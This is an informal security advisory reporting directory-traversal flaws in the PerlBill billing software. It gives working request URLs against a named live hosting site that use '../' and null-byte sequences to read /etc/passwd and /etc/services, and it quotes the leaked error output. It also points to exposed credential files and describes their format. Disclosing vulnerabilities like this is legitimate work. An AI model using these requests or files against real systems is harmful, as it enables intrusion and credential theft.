|
I was doing a small little security audit on a friends hosting website and noticed he was using PerlBill.
Stated on PerlBill.com, "PerlBill is a client management solution for companies selling on the Internet.
Using PerlBill you can manage orders, clients and client support efficiently. Our demonstration above will
give you a full overview of PerlBill features and possibilities."
As i was doing the audit, various directories were left un-indexed. Apparently noticing that not everything
had been uploaded. I took notice to various cgi scripts and attempted to try and exploit them using
directory transversal attacks and attempted to make the script remotely execute commands. I have found some
scripts that are slightly vulnerable to directory transversal attacks, but its minor. I cannot really tell
whats going in in the code due to the fact that i do not have the source code. Here are the results of some
transversals:
http://optixhosting.com/order/cgi-bin/kb.cgi?lang=../../../../../../../../../../e
tc/passwd%00
http://optixhosting.com/order/cgi-bin/client.cgi?lang=../../../../../../../../../
../../etc/services%00&do=register
http://optixhosting.com/order/cgi-bin/client.cgi?do=pro_login&lang=../../../../..
/../../../../../../etc/services%00&password=1&username=1
PerlBill Error: syntax error at include/lang/../../../../../../../../../../etc/passwd line 1, near "root:x:"
Compilation failed in require at kb.cgi line 52.
PerlBill: Script Error
Perlbill was unable to launch due to the following errors:
syntax error at include/lang/../../../../../../../../../../../etc/services line 22, near "tcpmux 1"
Compilation failed in require at client.cgi line 67.
PerlBill: Script Error
Perlbill was unable to launch due to the following errors:
syntax error at include/lang/../../../../../../../../../../../etc/services line 22, near "tcpmux 1"
Compilation failed in require at client.cgi line 67.
Apparently these are very minor because it cuts out the full value of the /etc/services file and
/etc/passwd file. Im sure there are many variations of the transversal or even more indepth attacks in
gaining the full source of the files. As i said before, i havent gotten a chance to view the source, since
you need to pay for the entire package.
Last but not least, as i was looking through the directories, i also noticed that there are 2 *.db files
containg logins with the encrypted password. Im not sure what algorithm they are in, for all i know it could
be unencrypted, maybe he has a hard password. Heres those two files:
http://[site]/include/lib/dbaccess.db
http://[site]/include/lib/dbpass.db
dbaccess.db will contain the following in this format:
[hostname]|[sql database name]|[sql database login]|[database password]
dbpass.db is different compared to that one, i believe it only contains the password line, and its
encrypted. As i noticed it, it was weird characters in a weird order like for example:
&ะท# e
could possibly be the password encrypted in some cheap algorithm, i have no idea, this advisory is just an
observation.
thanks for reading.
=================================
by atomix
atomix[at]seljak[dot]org
atomix[at]hush[dot]ai
atomix[at]nix[dot]org
greets: !tc crew, !sh crew @efnet, #nixsec@undernet, #darknet@efnet.
|
